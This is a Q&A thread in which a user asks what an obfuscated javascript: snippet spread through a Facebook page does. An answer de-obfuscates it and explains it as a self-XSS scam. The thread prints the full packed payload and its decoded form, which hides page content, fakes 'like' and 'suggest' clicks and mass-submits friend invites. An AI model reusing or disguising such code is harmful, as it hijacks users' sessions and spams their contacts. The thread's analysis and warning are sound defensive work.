# What exactly does this piece of JavaScript do?

Tags: javascript, facebook

I saw this page growing in popularity among my social circles on Facebook, [what 98 percent bla bla...](http://www.facebook.com/wylanan?ref=search&sid=678545710.3719697140..1#!/pages/What-98-of-people-never-knew-about-disney-movies/112015555504495) and it walks users through copying the below JavaScript (I added some indentation to make it more readable) into their address bar. Looks dodgy to me, but I only have a very basic knowledge of JavaScript.

Simply put, what does this do?

```
javascript:(function(){
a='app120668947950042_jop';
b='app120668947950042_jode';
ifc='app120668947950042_ifc';
ifo='app120668947950042_ifo';
mw='app120668947950042_mwrapper';
eval(function(p,a,c,k,e,r){
    e=function(c){
        return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))}
    ;
    if(!''.replace(/^/,String)){
        while(c--)r[e(c)]=k[c]||e(c);
        k=[function(e){
            return r[e]}
        ];
        e=function(){
            return'\\w+'}
        ;
        c=1}
    ;
    while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
    return p}
('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];
        d=U;
        d[e[2]](V)[e[1]][e[0]]=e[3];
        d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];
        s=d[e[2]](e[6]);
        m=d[e[2]](e[7]);
        c=d[e[9]](e[8]);
        c[e[11]](e[10],I,I);
        s[e[12]](c);
        C(D(){
            W[e[13]]()}
        ,E);
        C(D(){
            X[e[16]](e[14],e[15])}
        ,E);
        C(D(){
            m[e[12]](c);
            d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]}
        ,E);
        ',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{
}
))})();
```

Comment: I'm sure if you pasted it in your address bar you'd find out. I'd rather not do that.

Comment: Thank you for editing this :D  Seeing 'dose' all over the place was driving me crazy.

Answer (score 9, accepted):

I don't know so many are downvoting this. You are absolutely right to be suspicious about packed and otherwise-obfuscated scripts, especially with the rash of malvertisements affecting FB apps at the moment.

The first trick is to replace the `eval` on the results of the unpacker with an `alert` so you can see the code instead of executing it. That gives you something you can easily (but boringly) manually decode to:

```
document.getElementById('app120668947950042_mwrapper').style.visibility='hidden';        
document.getElementById('app120668947950042_jop').innerHTML=document.getElementById('app120668947950042_jode').value;
s=document.getElementById('suggest');
m=document.getElementById('likeme');
c=document.createEvent('MouseEvents');
c.initEvent('click',true,true);
s.dispatchEvent(c);

setTimeout(function(){
    fs.select_all()
}, 5000);
setTimeout(function(){
    SocialGraphManager.submitDialog('sgm_invite_form','/ajax/social_graph/invite_dialog.php')
}, 5000);
setTimeout(function(){
    m.dispatchEvent(c);
    document.getElementById('app120668947950042_ifo').innerHTML=document.getElementById('app120668947950042_ifc').value
}, 5000);
```

That looks like it's faking click on the ‘like’ and ‘suggest’ buttons (and subsequent dialogue), circumventing the normal controls FB require to interact with the site.

I'd report this page to FB.

In general, anything that asks you to enter a JavaScript URL is up to no good. This is the poor-man's-XSS. By allowing someone's code onto a page through a JS URL you are trusting them to do anything they want with your use of the site, as this crude social-engineering attempt demonstrates. It's depressing if a lot of people are falling for this. Maybe it's time for browsers to disallow typing `javascript:` URLs in the address bar.

Curse you Netscape for inventing the ugly `javascript:` not-really-a-URL hack and the thousands of security holes that have resulted from it!

Comment: Why the downvotes? Caution, probably. When it was first posted it was hard to tell if it was a legitimate question or if the OP just wanted someone to run it in their browser (for nefarious purposes).

Comment: Thanks for taking the time to do this; I did report the page but facebook usually seems content to let things like this sit. thanks again

Answer (score 2):

At first glance, it looks like a packing function, used to compress code into a string. Think of it like gzip compression.

Answer (score 1):

That looks like the code invite your friends to join a group or something along those lines..

They've been floating around facebook for a while.